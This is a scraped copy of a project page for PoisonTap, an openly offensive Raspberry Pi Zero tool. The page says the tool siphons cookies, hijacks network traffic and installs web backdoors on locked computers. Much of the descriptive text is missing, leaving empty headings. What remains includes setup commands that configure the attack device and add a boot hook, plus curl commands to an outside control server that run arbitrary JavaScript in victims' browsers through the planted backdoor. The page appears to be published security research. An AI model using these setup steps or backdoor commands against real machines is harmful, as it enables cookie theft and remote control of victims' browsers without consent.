PoisonTap - siphons cookies, exposes internal router & installs web backdoor on locked computers

Created by @SamyKamkar || https://samy.pl

When PoisonTap (Raspberry Pi Zero & Node.js) is plugged into a locked/password protected computer, it:

Live demonstration and more details available in the video:

PoisonTap evades the following security mechanisms:


PoisonTap is built for the $5 Raspberry Pi Zero without any additional components other than a micro-USB cable & microSD card, or can work on any Raspberry Pi (1/2/3) with an Ethernet-to-USB/Thunderbolt dongle, or can work on other devices that can emulate USB gadgets such as USB Armory and LAN Turtle.


(incredible HTML5 canvas animation by Ara)

Video Demo: https://youtu.be/Aatp5gCskvk

Point of Contact: @SamyKamkar // https://samy.pl

Released: November 16, 2016

Source code and download: https://github.com/samyk/poisontap

Media: WIRED ArsTechnica VICE TechCrunch Gizmodo BBC Popular Mechanics Forbes TheNextWeb BoingBoing The Register Hackaday

How PoisonTap Works

PoisonTap produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB/Thunderbolt, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors.

Network Hijacking

In a nutshell, PoisonTap performs the following:

Network Hijacking

Cookie Siphoning

Cookie Siphoning

Internal Router Backdoor

Remotely Accessible Web-Based Backdoors

Raspberry Pi Zero

Internal Router Backdoor & Remote Access

DNS Rebinding

Recap of the DNS server:

Additional Remotely Accessible Web-Based Backdoors


Securing Against PoisonTap

Server-Side Security

If you are running a web server, securing against PoisonTap is simple:

Desktop Security


Source code: https://github.com/samyk/poisontap

Installation / File Breakdown

Note: If you find the device is NOT acting as an Ethernet controller automatically (older versions of Windows, for example), you can change the VID and PID in pi_startup.sh

# Instructions adjusted from https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
sudo bash

# If Raspbian BEFORE 2016-05-10, then run next line:
BRANCH=next rpi-update

echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress\n\tnetmask" >> /etc/network/interfaces
echo "dtoverlay=dwc2" >> /boot/config.txt
echo -e "dwc2\ng_ether" >> /etc/modules
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

Place dhcpd.conf in /etc/dhcp/dhcpd.conf and the rest of the files in /home/pi/poisontap, then reboot to ensure everything is working.

There are a number of files in the repo, which are used on different sides. The list:

# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("",function(d)\{console.log(d)\})'


Point of Contact: @SamyKamkar

You can see more of my projects or contact me at https://samy.pl.